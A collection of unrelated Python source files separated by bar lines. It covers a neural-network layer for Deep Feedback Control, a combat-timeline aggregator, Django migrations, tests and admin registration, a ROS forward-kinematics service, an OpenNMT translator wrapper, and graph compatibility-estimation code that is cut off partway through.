from vectordatasource.meta.kinds import parse_all_kinds
import os.path
yaml_path = find_yaml_path()
sort_rank_path = os.path.join(
os.path.split(yaml_path)[0], 'spreadsheets', 'sort_rank')
# should be able to execute this without throwing an exception.
all_kinds = parse_all_kinds(yaml_path, sort_rank_path, True)
# and we should get some data back
self.assertTrue(all_kinds)
|
#!/usr/bin/env python3
# Copyright 2021 Alexander Meulemans, Matilde Tristany, Maria Cervera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @title :networks/dfc_layer.py
# @author :mc
# @contact :mariacer@ethz.ch
# @created :28/11/2021
# @version :1.0
# @python_version :3.7.4
"""
Implementation of a layer for Deep Feedback Control
---------------------------------------------------
A layer that is prepared to be trained with DFC.
"""
import numpy as np
import torch
import torch.nn as nn
from networks.layer_interface import LayerInterface
class DFCLayer(LayerInterface):
"""Implementation of a Deep Feedback Control layer.
It contains the following important functions:
* forward: which computes the linear activation based on the previous layer
as well as the post non-linearity activation. It stores these in the
attributes "_linear_activations" and "_activa.tions".
* compute_forward_gradients: computes the forward parameter updates and
stores them under "grad", by using the pre-synaptic activations and the
controller feedback. The ule is based on a voltage difference rule.
* compute_forward_gradients_continuous: same as "compute_forward_gradients"
but it performs an integration over time.
* compute_feedback_gradients: compute the feedback gradients.
* compute_feedback_gradients_continuous: same as
"compute_feedback_gradients" but it performs an integration over time.
Args:
(....): See docstring of class :class:`layer_interface.LayerInterface`.
last_layer_features (int): The size of the output layer.
"""
def __init__(self, in_features, out_features, last_layer_features,
bias=True, requires_grad=False, forward_activation='tanh',
initialization='orthogonal',
initialization_fb='weight_product'):
super().__init__(in_features, out_features, bias=bias,
requires_grad=requires_grad,
forward_activation=forward_activation,
initialization=initialization)
if initialization_fb is None:
initialization_fb = initialization
self._initialization_fb = initialization_fb
self._last_features = last_layer_features
self._activations = None
self._linear_activations = None
# Create and initialize feedback weights.
self.set_direct_feedback_layer(last_layer_features, out_features)
# The "weight_product" initialization is applied at the network level,
# since it requires knowledge of all weight matrices. So here, we
# initialize them equal to the feedfoward weights and then it will get
# overwritten.
if initialization_fb=='weight_product':
initialization_fb = initialization
self.init_layer(self._weights_backward,
initialization=initialization_fb)
@property
def weights_backward(self):
"""Getter for read-only attribute :attr:`_weights_backward`."""
return self._weights_backward
@weights_backward.setter
def weights_backward(self, tensor):
"""Setter for feedback weights.
Args:
tensor (torch.Tensor): The tensor of values to set.
"""
self._weights_backward = tensor
@property
def activations(self):
"""Getter for read-only attribute :attr:`activations` """
return self._activations
@activations.setter
def activations(self, value):
""" Setter for the attribute activations"""
self._activations = value
@property
def linear_activations(self):
"""Getter for read-only attribute :attr:`linear_activations` """
return self._linear_activations
@linear_activations.setter
def linear_activations(self, value):
"""Setter for the attribute :attr:`linear_activations` """
self._linear_activations = value
def set_direct_feedback_layer(self, last_features, out_features):
"""Create the network backward parameters.
This layer connects the output layer to a hidden layer. No biases are
used in direct feedback layers. These backward parameters have no
gradient as they are fixed.
Note that as opposed to DFA, here the backwards weights are not
Parameters.
Args:
(....): See docstring of method
:meth:`layer_interface.LayerInterface.set_layer`.
"""
self._weights_backward = torch.empty((out_features, last_features))
def forward(self, x):
"""Compute the output of the layer.
This method applies first a linear mapping with the parameters
``weights`` and ``bias``, after which it applies the forward activation
function.
In the forward pass there is no noise, and thus the normal activations
and the low-pass filtered activations are identical.
Args:
x (torch.Tensor): Mini-batch of size `[B, in_features]` with input
activations from the previous layer or input.
Returns:
The mini-batch of output activations of the layer.
"""
a = x.mm(self.weights.t())
if self.bias is not None:
a += self.bias.unsqueeze(0).expand_as(a)
self.linear_activations = a
self.linear_activations_lp = a
self.activations = self.forward_activation_function(a)
self.activations_lp = self.forward_activation_function(a)
return self.activations
def compute_forward_gradients(self, delta_v, r_previous, scale=1.,
saving_ndi_updates=False,
learning_rule='nonlinear_difference'):
"""Computes forward gradients using a local-in-time learning rule.
This function applies a non-linear difference learning rule as described
in Eq. (5) in the paper. Specifically, it compues the difference between
the non-linear transformation of basal and somatic voltages.
Depending on the option ``saving_ndi_updates`` these updates will be
stored in different locations (see argument docstring).
Args:
delta_v: The feedback teaching signal from the controller.
r_previous (torch.Tensor): The activations of the previous layer.
scale (float): Scaling factor for the gradients.
saving_ndi_updates (boolean): Whether to save the non-dynamical
inversion updates. When ``True``, computed updates are added to
``ndi_updates_weights`` (and bias) to later compare with the
steady-state/continuous updates. When ``False``, computed
updates are added to ``weights.grad`` (and bias), to be later
updated.
learning_rule (str): The type of learning rule.
"""
batch_size = r_previous.shape[0]
if learning_rule == "voltage_difference":
teaching_signal = 2 * (-delta_v)
elif learning_rule == "nonlinear_difference":
# Compute feedforward activations in basal and somatic compartments.
v_ff = torch.matmul(r_previous, self.weights.t())
if self.bias is not None:
v_ff += self.bias.unsqueeze(0).expand_as(v_ff)
v = delta_v + v_ff
# Compute the teaching signal based on the basal-somatic difference.
teaching_signal = self.forward_activation_function(v) - \
self.forward_activation_function(v_ff)
else:
raise ValueError('The rule %s is not valid.' % learning_rule)
# Compute the gradients and actual updates.
weights_grad = - 2 * 1./batch_size * teaching_signal.t().mm(r_previous)
weight_update = scale * weights_grad.detach()
if self.bias is not None:
bias_grad = - 2 * teaching_signal.mean(0)
bias_update = scale * bias_grad.detach()
# Store the updates appropriately.
if saving_ndi_updates:
self.ndi_updates_weights = weight_update
if self.bias is not None:
self.ndi_updates_bias = bias_update
else:
self._weights.grad += weight_update
if self.bias is not None:
self._bias.grad += bias_update
def compute_forward_gradients_continuous(self, v_time, v_ff_time,
r_previous_time, t_start=None, t_end=None,
learning_rule='nonlinear_difference'):
r"""Computes forward gradients using an integration (sum) of voltage
differences across comparments.
This weight update is identical to ``compute_forward_gradients``
except that it allows to integrate over more than one timestep.
However, here the somatic and basal voltages are assumed to have been
computed outside and provided as an input argument.
Args:
v_time: The somatic voltages at different timesteps.
v_ff_time: The basal voltages at different timesteps.
r_previous_time: The activations of the previous layer at different
timesteps.
t_start (int): The initial time index for the integration.
t_end (int): The final time index for the integration.
learning_rule (str): The type of learning rule.
"""
batch_size = r_previous_time.shape[1]
# Get the boundaries accross which to compute the summation.
if t_start is None:
t_start = 0
if t_end is None:
t_end = v_time.shape[0]
T = t_end - t_start
if learning_rule == "voltage_difference":
# Compute the teaching signal based on the voltage difference.
teaching_signal = v_time[t_start:t_end] - v_ff_time[t_start:t_end]
elif learning_rule == "nonlinear_difference":
# Compute the teaching signal based on the basal-somatic difference.
teaching_signal = \
self.forward_activation_function(v_time[t_start:t_end]) - \
self.forward_activation_function(v_ff_time[t_start:t_end])
else:
raise ValueError('The rule %s is not valid.' % learning_rule)
# Compute the gradients.
if self.bias is not None:
bias_grad = -2 * 1. / T * torch.sum(teaching_signal, axis=0).mean(0)
teaching_signal = teaching_signal.permute(0, 2, 1)
weights_grad = -2 * 1. / batch_size * 1. / T * \
torch.sum(teaching_signal @ \
r_previous_time[t_start:t_end, :, :], axis=0)
# Store the updates appropriately.
if self.bias is not None:
self._bias.grad = bias_grad.detach()
self._weights.grad = weights_grad.detach()
def compute_feedback_gradients_continuous(self, v_fb_time, u_time,
t_start=None, t_end=None,
sigma=1., beta=0., scaling=1.):
r"""Computes feedback gradients using an integration (sum) of voltage.
This weight update is identical to :meth:`compute_feedback_gradients`
except that it allows to integrate over more than one timestep.
It follows the differential equation:
.. math::
\frac{dQ_i}{dt} = -\mathbf{v}_i^\text{fb} \mathbf{u}(t)^T - \
\beta Q_i
Refer to :meth:`compute_feedback_gradients` for variable details.
Note that pytorch saves the positive gradient, hence we should save
:math:`-\Delta Q_i`.
Args:
v_fb_time (torch.Tensor): The apical compartment voltages over
a certain time period.
u_time (torch.Tensor): The control inputs over certain time period.
t_start (torch.Tensor): The start index from which the summation
over time should start.
t_end (torch.Tensor): The stop index at which the summation over
time should stop.
sigma (float): The standard deviation of the noise in the network
dynamics. This is used to scale the fb weight update, such that
its magnitude is independent of the noise variance.
beta (float): The homeostatic weight decay parameter.
scaling (float): In the theory for the feedback weight updates, the
update for each layer should be scaled with
:math:`(1+\tau_{v}/\tau_{\epsilon})^{L-i}`, with L the amount of
layers and i the layer index. ``scaling`` should be the factor
:math:`(1+\tau_{v}/\tau_{\epsilon})^{L-i}` for this layer.
"""
batch_size = v_fb_time.shape[1]
# Get the boundaries accross which to compute the summation.
if t_start is None:
t_start = 0
if t_end is None:
t_end = v_fb_time.shape[0]
T = t_end - t_start
# Compute the gradient scaling.
if sigma < 0.01:
scale = 1 / 0.01 ** 2
else:
scale = 1 / sigma ** 2
scale *= scaling
# Compute the update.
feedbackweights_grad = scale/(T * batch_size) * \
torch.sum(v_fb_time[t_start:t_end].permute(0,2,1) \
@ u_time[t_start:t_end], axis=0)
feedbackweights_grad += beta * self._weights_backward
self._weights_backward.grad = feedbackweights_grad.detach()
def save_feedback_batch_logs(self, writer, step, name, no_gradient=False,
pretraining=False):
"""Save feedback weight stats for the latest mini-batch.
Args:
writer (SummaryWriter): Summary writer from tensorboardX.
step (int): The global step used for the x-axis of the plots.
name (str): The name of the layer.
no_gradient (bool): Flag indicating whether we should skip saving
the gradients of the feedback weights.
pretraining (bool): Flag indicating that the training is in the
initialization phase (only training the feedback weights).
"""
if pretraining:
prefix = 'feedback_training/{}/'.format(name)
else:
prefix = name + '/'
feedback_weights_norm = torch.norm(self.weights_backward)
writer.add_scalar(tag=prefix + 'feedback_weights_norm',
scalar_value=feedback_weights_norm,
global_step=step)
if self.weights_backward.grad is not None:
feedback_weights_grad_norm = torch.norm(self.weights_backward.grad)
writer.add_scalar(tag=prefix + 'feedback_weights_gradient_norm',
scalar_value=feedback_weights_grad_norm,
global_step=step)
@property
def name(self):
return 'DFCLayer'
|
"""Creates a module and necessary tools for averaging and aggregating timeline reports."""
from collections import defaultdict
import itertools
import re
from statistics import mean
def parse_timeline_events(timeline):
"""Update the timeline event map from the timeline output.
Non-commented timeline entries are parsed and the event timestamp is appended
to the list of times an event label occurs.
For example:
3.5 "Phantom Flurry" sync /:Suzaku:32DD:/
7.0 "Screams Of The Damned" sync /:Suzaku:32D2:/
10.5 "Phantom Flurry" sync /:Suzaku:32DD:/
Will create the following mapping:
{
'"Phantom Flurry" sync /:Suzaku:32DD:/': [3.5, 10.5],
'"Screams Of The Damned" sync /:Suzaku:32D2:/': [7.0]
}
"""
timeline_event_map = defaultdict(list)
for line in timeline:
# Ignore comments, alertall, hideall, etc by
# only reading lines starting with a number
if not line[0].isdigit():
continue
# Remove trailing comment, if any
clean_line = line.split('#')[0]
# Split the line into sections
match = re.search(r'^(?P<time>[\d\.]+)\s+"(?P<label>.+)"\s+(?P<options>.+)', clean_line)
if not match:
continue
event_time = float(match[1])
label = '"{match[2]}" {match[3]}'.format(match=match)
# Add the timestamp to the event's list of occurrences
timeline_event_map[label].append(event_time)
return timeline_event_map
def output_to_timeline(timeline_event_map):
"""Returns a timeline-friendly list from an event mapping.
Creates a list of events sorted in ascending numerical order as Advanced
Combat Tracker would expect. Returns the list as a Python list, to be altered
or printed into the expected parsable format.
"""
timeline_events = set()
for key, values in timeline_event_map.items():
for value in values:
timeline_events.add('{time} {event}'.format(time=value, event=key))
return sorted(list(timeline_events), key=lambda s: float(s.split()[0]))
def create_averaging_function(threshold):
"""Creates and returns a function to group by.
Creates the averaging function to be used with the itertools.groupby()
function. Takes a threshold value in seconds as input to average groups
of similar event times.
"""
key = None
def averaging_function(event_time):
"""Averages event time values based on a threshold.
For any event where the event time is less than the key value, keep
returning key. If the event time exceeds the key, update the key value.
"""
nonlocal key
if key is None:
key = event_time + threshold
elif event_time >= key:
key = event_time + threshold
return key
return averaging_function
def average_similar_events(values, threshold):
"""Return a list where similar numbers have been averaged.
Items are grouped using the supplied width and criteria and the
result is rounded to precision if it is supplied. Otherwise
averages are not rounded.
"""
grouped_values = itertools.groupby(values, create_averaging_function(threshold))
return list(round(mean(group), 1) for _, group in grouped_values)
class TimelineAggregator():
"""Aggregates timelines and averages their event times.
Takes an input of N timelines and attempts to smooth their event times to
find the line of best fit when determining when events occur.
"""
def __init__(self, timelines):
self.timelines = timelines
def aggregate(self, averaging_threshold=2.0):
"""Aggregates timelines and returns a list of their events.
Aggregates timelines with an averaging threshold defined in seconds. Any
duplicate events found with the same memory signature within those events
will be averaged by taking the mean of each near-duplicate event grouping.
"""
aggregate_event_map = defaultdict(list)
# Parse all events within the timelines passed to the aggregator
for timeline in self.timelines:
for key, values in parse_timeline_events(timeline).items():
aggregate_event_map[key] += values
# Average similar values for duplicate events to get a better approximate timeline
for key, values in aggregate_event_map.items():
aggregate_event_map[key] = average_similar_events(sorted(values), averaging_threshold)
# Return the aggregated event mapping as a timeline output
return output_to_timeline(aggregate_event_map)
|
# Generated by Django 2.2 on 2019-04-17 02:13
from django.db import migrations
def drop_madison_taproom(apps, schema_editor):
venue = apps.get_model("venues.Venue")
beer_price = apps.get_model("beers.BeerPrice")
beer_price.objects.filter(venue__id=2).delete()
venue.objects.filter(id=2).delete()
class Migration(migrations.Migration):
dependencies = [
("venues", "0012_auto_20190328_1915"),
]
operations = [
migrations.RunPython(drop_madison_taproom, migrations.RunPython.noop),
]
|
#!/usr/bin/env python
# import modules
import rospy
import numpy as np
from std_msgs.msg import Float64
from sympy import symbols, cos, sin, pi, simplify
from sympy.matrices import Matrix
from geometry_msgs.msg import Point
from kuka_arm.srv import *
def handle_calculate_FK_request(req):
endPoints = Point()
q1_in = req.q1
q2_in = req.q2
q3_in = req.q3
q4_in = req.q4
q5_in = req.q5
q6_in = req.q6
q1_in = 0
q2_in = 0
q3_in = 0
q4_in = 0
q5_in = 0
q6_in = 0
print(req.q1)
print(req.q2)
print(req.q3)
print(req.q4)
print(req.q5)
print(req.q6)
### FK code
# Create symbols
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') #theta_i
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')
a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7')
# Create Modified DH parameters
s = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -pi/2, a1: 0.35, d2: 0, q2:q2-pi/2,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -pi/2, a3: -0.054, d4: 1.5,
alpha4: pi/2, a4: 0, d5: 0,
alpha5: -pi/2, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7:0}
#
# Define Modified DH Transformation matrix
T0_1 = Matrix([[ cos(q1), -sin(q1), 0, a0],
[sin(q1)*cos(alpha0), cos(q1)*cos(alpha0), -sin(alpha0), -sin(alpha0)*d1],
[sin(q1)*sin(alpha0), cos(q1)*sin(alpha0), cos(alpha0), cos(alpha0)*d1],
[ 0, 0, 0, 1]])
T0_1 = T0_1.subs(s)
T1_2 = Matrix([[ cos(q2), -sin(q2), 0, a1],
[sin(q2)*cos(alpha1), cos(q2)*cos(alpha1), -sin(alpha1), -sin(alpha1)*d2],
[sin(q2)*sin(alpha1), cos(q2)*sin(alpha1), cos(alpha1), cos(alpha1)*d2],
[ 0, 0, 0, 1]])
T1_2 = T1_2.subs(s)
T2_3 = Matrix([[ cos(q3), -sin(q3), 0, a2],
[sin(q3)*cos(alpha2), cos(q3)*cos(alpha2), -sin(alpha2), -sin(alpha2)*d3],
[sin(q3)*sin(alpha2), cos(q3)*sin(alpha2), cos(alpha2), cos(alpha2)*d3],
[ 0, 0, 0, 1]])
T2_3 = T2_3.subs(s)
T3_4 = Matrix([[ cos(q4), -sin(q4), 0, a3],
[sin(q4)*cos(alpha3), cos(q4)*cos(alpha3), -sin(alpha3), -sin(alpha3)*d4],
[sin(q4)*sin(alpha3), cos(q4)*sin(alpha3), cos(alpha3), cos(alpha3)*d4],
[ 0, 0, 0, 1]])
T3_4 = T3_4.subs(s)
T4_5 = Matrix([[ cos(q5), -sin(q5), 0, a4],
[sin(q5)*cos(alpha4), cos(q5)*cos(alpha4), -sin(alpha4), -sin(alpha4)*d5],
[sin(q5)*sin(alpha4), cos(q5)*sin(alpha4), cos(alpha4), cos(alpha4)*d5],
[ 0, 0, 0, 1]])
T4_5 = T4_5.subs(s)
T5_6 = Matrix([[ cos(q6), -sin(q6), 0, a5],
[sin(q6)*cos(alpha5), cos(q6)*cos(alpha5), -sin(alpha5), -sin(alpha5)*d6],
[sin(q6)*sin(alpha5), cos(q6)*sin(alpha5), cos(alpha5), cos(alpha5)*d6],
[ 0, 0, 0, 1]])
T5_6 = T5_6.subs(s)
T6_G = Matrix([[ cos(q7), -sin(q7), 0, a6],
[sin(q7)*cos(alpha6), cos(q7)*cos(alpha6), -sin(alpha6), -sin(alpha6)*d7],
[sin(q7)*sin(alpha6), cos(q7)*sin(alpha6), cos(alpha6), cos(alpha6)*d7],
[ 0, 0, 0, 1]])
T6_G = T6_G.subs(s)
#
# Create individual transformation matrices
T0_1 = simplify(T0_1)
T0_2 = simplify(T0_1 * T1_2)
T0_3 = simplify(T0_2 * T2_3)
T0_4 = simplify(T0_3 * T3_4)
T0_5 = simplify(T0_4 * T4_5)
T0_6 = simplify(T0_5 * T5_6)
T0_G = simplify(T0_6 * T6_G)
#
# Correction for the gripper orientation
R_z = Matrix([[ cos(np.pi), -sin(np.pi), 0, 0],
[ sin(np.pi), cos(np.pi), 0, 0],
[ 0, 0, 1, 0],
[ 0, 0, 0, 1]])
R_y = Matrix([[ cos(-np.pi/2), 0,sin(-np.pi/2), 0],
[ 0, 1, 0, 0],
[ -sin(-np.pi/2), 0,cos(-np.pi/2), 0],
[ 0, 0, 0, 1]])
R_corr = simplify(R_z*R_y)
#
# Print to compare with simluation results
print(T3_4[0:3,0:3])
print(T4_5[0:3,0:3])
print(T5_6[0:3,0:3])
print(simplify((T3_4*T4_5*T5_6))[0:3,0:3])
print(simplify((T5_6*T4_5*T3_4))[0:3,0:3])
print(T0_1.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_2.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_3.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_4.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_5.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_6.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
print(T0_G.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in}))
###
T0_G_eval = T0_G.evalf(subs={q1:q1_in, q2:q2_in, q3:q3_in, q4:q4_in, q5:q5_in, q6:q6_in})
xG = T0_G_eval[0,3]
yG = T0_G_eval[1,3]
zG = T0_G_eval[2,3]
print(xG)
print(yG)
print(zG)
return CalculateFKResponse(xG)
def FK_service():
rospy.init_node('FK_calculator')
service = rospy.Service('~calculate_FK', CalculateFK, handle_calculate_FK_request)
print "Ready to receive a FK request"
rospy.spin()
if __name__ == "__main__":
FK_service()
|
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@gmail.com', password='pass12345'):
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
def test_create_user_with_email_sucessful(self):
email = 'test@gmail.com'
password = 'test12345'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
email="test@GMAIL.COM"
user = get_user_model().objects.create_user(email, 'test124')
self.assertEqual(user.email, email.lower())
def test_new_user_invalid_email(self):
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test1234')
def test_create_new_super_user(self):
user = get_user_model().objects.create_superuser(
'test@testt.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredients_str(self):
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recepie_str(self):
recepie = models.Recepie.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=22.00
)
self.assertEqual(str(recepie), recepie.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
"""Test that image is saved in the correct location"""
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
|
from model_register import State, Country, County, GroundWaterWell, ReclamationPlant, Stream, \
Precipitation, SpreadingGround
from django.contrib import admin
admin.site.register(State)
admin.site.register(County)
admin.site.register(Country)
admin.site.register(GroundWaterWell)
admin.site.register(ReclamationPlant)
admin.site.register(Stream)
admin.site.register(Precipitation)
admin.site.register(SpreadingGround)
|
import onmt
import onmt.modules
class TranslatorParameter(object):
def __init__(self, filename):
self.model = "";
self.src = "<stdin>";
self.src_img_dir = "";
self.tgt = "";
self.output = "<stdout>";
self.beam_size = 1
self.batch_size = 1
self.max_sent_length = 100
self.dump_beam = ""
self.n_best = self.beam_size
self.replace_unk = False
self.gpu = -1;
self.cuda = 0;
self.verbose = False
self.beta=0.0
self.alpha=0.0
self.start_with_bos=True
self.fp16=False
self.ensemble_op='mean'
self.autoencoder=None
self.encoder_type='text'
self.read_file(filename)
def read_file(self,filename):
f = open(filename)
line = f.readline()
while line:
w = line.strip().split()
if w[0] == "model":
self.model = w[1]
elif w[0] == "beam_size":
self.beam_size = int(w[1])
line = f.readline()
class OnlineTranslator(object):
def __init__(self, model):
opt = TranslatorParameter(model)
self.translator = onmt.EnsembleTranslator(opt)
def translate(self,input):
predBatch, predScore, predLength, goldScore, numGoldWords,allGoldScores = self.translator.translate([input.split()],[])
return " ".join(predBatch[0][0])
|
"""
Estimation methods for Compatibility Estimation described in
Factorized Graph Representations for Semi-Supervised Learning from Sparse Data (SIGMOD 2020)
Krishna Kumar P., Paul Langton, Wolfgang Gatterbauer
https://arxiv.org/abs/2003.02829
Author: Wolfgang Gatterbauer
License: Apache Software License
TODO: nicer to separate the 'estimateH' from 'define_energy_H' into separate methods
"""
import numpy as np
from numpy import linalg as LA
import scipy.sparse as sparse
from numbers import Number # for isinstance(n, Number)
from scipy import optimize
import itertools
import warnings
from random import shuffle
import random
import copy
from time import time
from utils import (W_star,
to_centering_beliefs,
matrix_difference,
eps_convergence_linbp_parameterized)
from inference import linBP_symmetric_parameterized
def define_energy_H(method='DHE',
H_vec_observed=None,
weights=None, distance=1,
X=None, W=None, EC=True, variant=1,
alpha=0, beta=0):
"""Returns an energy function 'energy_H(H)' that is used by 'estimateH' to find the optimal H.
Three options: 'MHE', 'DHE', 'LHE' (for Myopic / Distant / Linear Heterophily (Compatibiltiy) Estimation)
Original variant: constructed from X, W with chosen methods (e.g. DHE: weights, distance, variant, EC, alpha, beta)
New variant: allows to give H_vec_observed directly (to estimate it once on graph and use it for both energy and gradient)
For 'LHE':
uses: X, W, alpha, beta (alpha, beta not actively used)
ignores: H_vec_observed, EC, distance, weights, variant
For 'DHE':
If 'H_vec_observed' is specified: uses only weights, distance
else: also uses W, X, EC, variant, alpha, beta to calculate 'H_vec_observed'
For 'DHE':
If 'H_vec_observed' is specified: ignores everything
else: uses W, X, EC, variant, alpha, beta to calculate 'H_vec_observed'
Parameters
----------
method : string (Default='DHE')
Three options: 'MHE', 'DHE', 'LHE'
H_vec_observed : list [H1, H2, ..., Hd]
Hd being the row-normalized Markov matrix that is used for DHE
weights : np array (Default = np.ones(distance))
Notice that 'estimateH' allows to specify a single weight that is then transformed into an array via np.array([np.power(weights, i) for i in range(distance)])
EC : Boolean (Default=True) TODO: should better be renamed to NB (Non-Backtracking)
If true, ignores the backtracking paths (NB = True)
variant : int (Default=1)
Mostly historical, variant=1 works best, see SIGMOD 2020 paper for variants
alpha, beta : real (Default=0)
Allows different normalizations (not used)
"""
# TODO: think about centered X as input
if H_vec_observed is not None:
_, k = H_vec_observed[0].shape
else:
_, k = X.shape
if weights is None:
weights = np.ones(distance)
assert len(weights) >= distance
if alpha != 0 or beta != 0:
W = W_star(W, alpha=alpha, beta=beta)
if method in ('MHE', 'DHE') and H_vec_observed == None:
H_vec_observed = H_observed(W, X, distance=distance, NB=EC, variant=variant)
if method == 'MHE':
def energy_H(H):
return LA.norm(H_vec_observed[0] - H)
elif method == 'DHE':
# the following 5 path lengths are written explicitly in order to speed up calculation
if distance == 1:
def energy_H(H):
return LA.norm(H_vec_observed[0] - H)
elif distance == 2:
def energy_H(H):
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H.dot(H))
elif distance == 3:
def energy_H(H):
H2 = H.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H2.dot(H))
elif distance == 4:
def energy_H(H):
H2 = H.dot(H)
H3 = H2.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H3) \
+ weights[3] * LA.norm(H_vec_observed[3] - H3.dot(H))
elif distance == 5:
def energy_H(H):
H2 = H.dot(H)
H3 = H2.dot(H)
H4 = H3.dot(H)
return weights[0] * LA.norm(H_vec_observed[0] - H) \
+ weights[1] * LA.norm(H_vec_observed[1] - H2) \
+ weights[2] * LA.norm(H_vec_observed[2] - H3) \
+ weights[3] * LA.norm(H_vec_observed[3] - H4) \
+ weights[4] * LA.norm(H_vec_observed[4] - H4.dot(H))
else:
def energy_H(H):
S = 0
for i in range(distance):
S += weights[i] * LA.norm(H_vec_observed[i] - LA.matrix_power(H, i + 1))
return S
elif method == 'LHE':
def energy_H(H):
return LA.norm(X - W.dot(X).dot(H))
else:
raise Exception("You specified a non-existing method")
return energy_H
# default numberOfSplits = 4
# needs all the parameters required for propagation
def estimateH_baseline_parallel(X2, ind, W, numberOfSplits=4, numMax=20, ignore_rows=None, method='noecho', variant=1, distance=1, EC=False, randomize=False, weights=None,
initial_H0=None, constraints=False, alpha=0., beta=0., gamma=1., doubly_stochastic=True):
"""Estimation of H, using train-test methods and minimizing the aggregated accuracies over several splits
TODO: should be integrated with the _serial function; only minor modifications
Parameters
----------
X2 : [n x k] np array
seed belief matrix
ind: indices of seed beliefs in matrix X2
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
numberOfSplits: splits for train-test
methods: string
choices: ['MHE', 'LHE', 'LHEregular', 'LHE2']
MHE: Myopic Heterophily Estimation
LHE: Linear Heterophily Estimation
LHEregular: Summation formula like in standard regularization framework (very slow)
LHE2: with echo
weights: list(Default = None)
List of weights of various pathlength. w[0] is weight of neighbors (path length = 1), etc.
distance: int (Default = 1)
maximal distance (path length) that is included for estimations
EC: Boolean (Default = True)
For method MHE: If True: Calculates the neighbors in distance d while ignoring back-tracking paths
variant: int (Default = 1)
For method MHE for H_observed: variant 1: row-normalized. (2: symmetric normalized. 3: symmetric scaled)
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
An attempt to deal with non-convexity
initial_H0: list of list of float (Default=None)
Option to specify a list of initial values for h0 from which to start the optimization when searching for best H
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
alpha, beta: Float (Default = 0)
Optional normalization of propagation matrix
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
"""
n, k = X2.shape
if doubly_stochastic:
k_star = k * (k - 1) // 2 # integer division, returns integer
else:
k_star = k * (k - 1)
if weights is None:
weights = np.ones(distance)
indices = list(ind)
halfLen = int(len(indices) / 2)
X_train_split = {}
X_test_split = {}
train_split_idx = {}
test_split_idx = {}
print('Baseline parallel over {} splits'.format(numberOfSplits))
for iter in range(numberOfSplits):
shuffle(indices)
train_split_idx[iter] = indices[:halfLen] # indices of train set
test_split_idx[iter] = indices[halfLen:] # indices of test set
X_train_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in train_split_idx[iter]:
X_train_split[iter][i] = np.zeros(k)
X_test_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in test_split_idx[iter]:
X_test_split[iter][i] = np.zeros(k)
def energy_h(h):
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
p = dict()
q = dict()
all_acc = np.zeros(numberOfSplits)
for iter in range(numberOfSplits):
q[iter] = Queue() # create a queue object for returning values
p[iter] = Process(target=calculate_accuracy, args=(H, X_train_split.get(iter), X_test_split.get(iter), train_split_idx.get(iter), test_split_idx.get(iter), W, q[iter]))
p[iter].start()
for iter in range(numberOfSplits):
all_acc[iter] = q[iter].get()
for iter in range(numberOfSplits):
p[iter].join()
return (-1 * np.average(all_acc))
def calculate_accuracy(H, X_train, X_test, train_ind, test_ind, W, return_output, s=0.5): # all that is needed to propagate
H0c = to_centering_beliefs(H)
eps_max = eps_convergence_linbp_parameterized(H0c, W,
method='noecho',
